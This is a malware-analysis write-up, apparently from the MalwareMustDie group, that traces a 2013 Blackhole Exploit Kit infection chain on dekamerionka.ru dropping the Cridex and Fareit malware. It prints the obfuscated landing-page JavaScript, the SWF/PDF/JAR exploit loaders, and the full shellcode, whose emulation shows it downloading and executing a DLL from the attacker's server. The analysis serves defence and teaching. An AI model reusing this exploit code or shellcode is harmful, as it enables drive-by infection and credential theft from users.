A Guide to flush infectors & payload at BHEK Infection on dekamerionka.ru:8080

Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th

Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Sample Download--->>[MEDIAFIRE]

Guide & Log: (I'm sorry for using texts as report.. Lack of time)
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam 
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================

Infector urls...

h00p://ideawiz.org/letter.htm 
h00p://threesaints.org.uk/letter.htm 
h00p://masreptiles.terrarium.pl/letter.htm 

//All of the dirty stuff's download urls result:

PD-079  : h00p://dekamerionka.ru:8080/forum/links/column.php
jar     : h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f

//infector page access...

--20:26:45--  h00p://threesaints.org.uk/letter.htm
           => `letter.htm'
Resolving threesaints.org.uk... seconds 0.00, 173.254.28.107
Caching threesaints.org.uk => 173.254.28.107
Connecting to threesaints.org.uk|173.254.28.107|:80... seconds 0.00, connected.
  :
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints.org.uk
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 425 [text/html]
"20:26:47 (11.89 MB/s) - letter.htm saved [425/425]"


// was having this codes...

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>

</body>
</html>

-----------------------------------------------------------
"
// forward you to the landing page of BHEK....
"
--20:28:05--  h00p://dekamerionka.ru:8080/forum/links/column.php
           => `column.php
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
"20:28:07 (69.85 KB/s) - column.php saved [117566]"
A new obfuscation BHEK landing page.. first time to see this :
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime" 
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
      :
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";


a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
 c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
  </script></body></html>
Landing page structure:
   :
// applet
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>

   :

// first script
 function c()
 {
   if(window.document)s+=String.fromCharCode(a「i」);
 }
 e=eval;
 sp="split";
 

// soon followed by second script+obfuscation data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";

// generator..
 a=a.replace(/!/g,1)[sp](":");
 for(i=0,s="";i<a.length;i++)
 {
   c();
 }
 z=true;
 try
 {
   document.createElement("span");
 }
 catch(q)
 {
   z=false;
 }
 if(window.document)if(z)e(s);
The summary of the infection method used in this landing page.
// From this landing page we will get infections as follows:

"1. The HTML landing page applet will infect you with -

// - first infection of jar (it has the 0day java jar here..)"
    <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
    <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
    <param value="" name="prime" /></applet>

"2. The obfuscation landing page will infect you:
      
// flash/swf SWF1 exploit....."
   function getCN()
   { return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
     "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }

"//pdf1"
   function p1(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);}

"//pdf2"
   function p2(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);
}

"//flash/swf SWF2 exploit...."
   function ff2(){
   var oSpan = document.createElement("span");
   var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") +   "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
   oSpan.innerHTML = "
    <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
    <param name='movie' value='" + url + "' />
    <param name='allowScriptAccess' value='always' />
    <param name='Play' value='0' />
    <embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
    </embed></object>
    ";
    document.body.appendChild(oSpan);  }

"// a shellcode (to be called by other exploitor as key of payload)"
   function getShellCode(){
   var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
   reverse().join("");
   return a["replace"](/\%!/g, "%" + "u")  }

"// and a jar component to detect your java version"
   $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo.jar");
Shellcode & Payload:
"// change the code into below & see the result of the burped shellcode:"

var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);

"// output :"

%u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uO9e9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad
%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d
%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd
%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d
%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385
%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278
%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c
%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef
%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f
%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842
%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28
%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2
%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u4d4c%u4943%u4d45%u415a%u4647%u4943%u5aO6%u125d%u181O
%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e4f%u1b15%u1218%u4619
%u1912%u1241%u4119%u1b12%uOe1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243
%u191b%u1912%u1242%u4719%u49Oe%u1915%uOe43%u474f%u4615%u43Oe%u155e%u2844%uOO28

--------------------------------------------------------------------------------


"// #Tips if you want to use libemu to crack this I made the below format for you.."

import pylibemu
 
shellcode  = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x1O\xc9\x31\x81\x66\xO9\xe9\x8O\xfe\x28\x3O\xe2\x4O\xeb\xfa\xe8\xO5\xff\xeb"
shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\x68\xa3\xa3\x24\x34\x58\xa3\x7e\x2O\x5e\xf3\x1b\xa3\x4e\x14\x76"
shellcode += b"\x5c\x2b\xO4\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x9O\x18\x68\x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\xOc\x5d\xcc\xc1\x79\x64\xc3"
shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x5O\x7e\xdd\x5e\xa3\x2b\xO8\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96"
shellcode += b"\xda\x1O\x2O\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\xce\x5d\xa3\x76\xOc\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4"
shellcode += b"\xOc\x7c\xa3\x24\x2b\xfO\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\xeb\x71\x7b\xc3\xa3\x85\xO8\x4O\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe"
shellcode += b"\xa3\xdb\x2O\x4O\xdf\xa3\x2d\x42\xcO\x71\xd7\xbO\xd7\xd7\xd1\xca\x28\xcO\x28\x28\x7O\x28\x42\x78\x4O\x68\x28\xd7\x28\x28"
shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\xcb\xd7\x47\x4O\x28\x46\x4O\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e"
shellcode += b"\x2O\xec\xcO\xa3\x49\xcO\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\x2c\xc4\x28\x29\xa5\x28\xOc\x74\xef\x24\xOc\x2c\x4d\x5a\x5b\x4f"
shellcode += b"\x6c\xef\x2c\xOc\x5a\x5e\x1a\x1b\x6c\xef\x2O\xOc\xO5\xO8\xO8\x5b\x4O\x7b\x28\xdO\x28\x28\x7e\xd7\xa3\x24\x1b\xcO\x79\xe1"
shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\xO6\x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xaO\x2c\x35"
shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b"
shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x2O\x7e\xb4\xcO"
shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xbO\xc4\xa2\xd6\xa1\x26\x29\x47\x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\xO7\x32\x4O\x58\x5c\x5c"
shellcode += b"\x12\x58\xO7\xO7\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\x49\x43\x5a\xO6\x12\x5d\x18\x1O\x18\x1O\x4e\xO7\x5a\x47\x45\x5d"
shellcode += b"\x44\xO7\x46\x41\x5b\x43\x4b\xO7\x44\x47\x45\x5d\xO6\x46\x4O\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41"
shellcode += b"\x41\x19\x1b\x12\xOe\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43"
shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\xOe\x19\x15\xOe\x43\x47\x4f\x46\x15\x43\xOe\x15\x5e\x28\x44\xOO\x28"
 
emulator = pylibemu.Emulator()
offset = emulator.shellcode_getpc_test(shellcode)
offset
 
emulator.prepare(shellcode, offset)
emulator.test()
print emulator.emu_profile_output
"
----------------------------------------------------------------------------
// my way is...
// sav the binary and disassembly it..
----------------------------------------------------------------------------"
41 41 41 41 66 83 e4 fc  fc eb 1O 58 31 c9 66 81   AAAAf......X1.f.
e9 O9 fe 8O 3O 28 4O e2  fa eb O5 e8 eb ff ff ff   ....O(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
58 34 7e a3 5e 2O 1b f3  4e a3 76 14 2b 5c 1b O4   X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 9O a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
af 1c Oc ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
5c 1d 5O 2b dd 7e a3 5e  O8 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  1O da 5c 2O e9 e3 25 2b   .+.....8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 Oc 2b f5 4e a3   .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c Oc  24 a3 fO 2b f5 a3 2c a3   $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 4O O8 a8 55 24 1b   +..vq..{..@..U$.
5c 2b be c3 db a3 4O 2O  a3 df 42 2d 71 cO bO d7   \+....@...B-q...
d7 d7 ca d1 cO 28 28 28  28 7O 78 42 68 4O d7 28   .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
d7 cb 4O 47 46 28 28 4O  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
ec 2O a3 cO cO 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
29 28 28 a5 74 Oc 24 ef  2c Oc 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
Oc 2c 5e 5a 1b 1a ef 6c  Oc 2O O8 O5 5b O8 7b 4O   .,^Z...l....[.{@
dO 28 28 28 d7 7e 24 a3  cO 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  O6 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 aO 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
d6 d7 7e 2O cO b4 d6 d7  d7 a6 66 26 c4 bO d6 a2   ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 O7   &.G)....s3.nQ.2.
58 4O 5c 5c 58 12 O7 O7  4c 4d 43 49 45 4d 5a 41   X@\\X...LMCIEMZA
47 46 43 49 O6 5a 5d 12  1O 18 1O 18 O7 4e 47 5a   GFCI.Z]......NGZ
5d 45 O7 44 41 46 43 5b  O7 4b 47 44 5d 45 46 O6   ]E.DAFC[.KGD]EF.
58 4O 58 17 4f 4e 15 1b  18 12 19 46 12 19 41 12   X@X.ON.....F..A.
19 41 12 1b 1b Oe 47 4d  15 1a 5e 12 19 43 12 19   .A....GM..^..C..
45 12 1b 1a 12 1b 1b 12  19 43 12 19 43 12 1b 19   E........C..C...
12 19 42 12 19 47 Oe 49  15 19 43 Oe 4f 47 15 46   ..B..G.I..C.OG.F
Oe 43 5e 15 44 28 28 OO                            .C^.D((.        


-------------------------------------------------------------------"

// see the payload url below in the 0x1a494bbe at urlmon? ↓                                  "

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
                                                                                                    "
//payload is here..                                                                           "
h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
                                                                                               "
//download...                                                                           "

--21:33:38--  h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
           => `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :                                                                                               "
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0                                                                                        "
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  : 
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private                                                              "
Content-Disposition: attachment; filename=calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK                                                                                    "
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288       64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288]                "
Getting infector components
    :
// let's get the SWF1...
// I prefer to check the obfuscated link in below function:

function getCN(){
  return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
  "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }

// it is using function x, so let's use it too to decode values of url string..

function x(s){
  d = [];
  for (i = 0; i < s.length; i ++ ){
    k = (s.charCodeAt(i)).toString(33);
    d.push(k);}  ;  return d.join(":");}
var xxx= "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);

// result:
/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy

//download it...
h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238         22.73K/s

// Get the SWF2 Infector,..

// same method...
h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp

HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946           --.--K/s
21:51:14 (26.47 MB/s) - "column.php@jkmflr=30%3A1n%3A1i%3A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]


// Get the PDF 1 & 2 infectors..., w/ understanding value of  x(pdfver.join("."))= "1k:1d:1f:1d:1g:1d:1f"

/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
   ↓
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f

// shortly, the download logs..

     :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575        40.09K/s
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781         59.75K/s


// And the JAR...

// see the applet url...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe">
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>

http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20            --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]

// hmm.. the jar looks failed.. :-( Let's re-set the "request" :


// retry - try1 (old java version)

--16:24:19--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
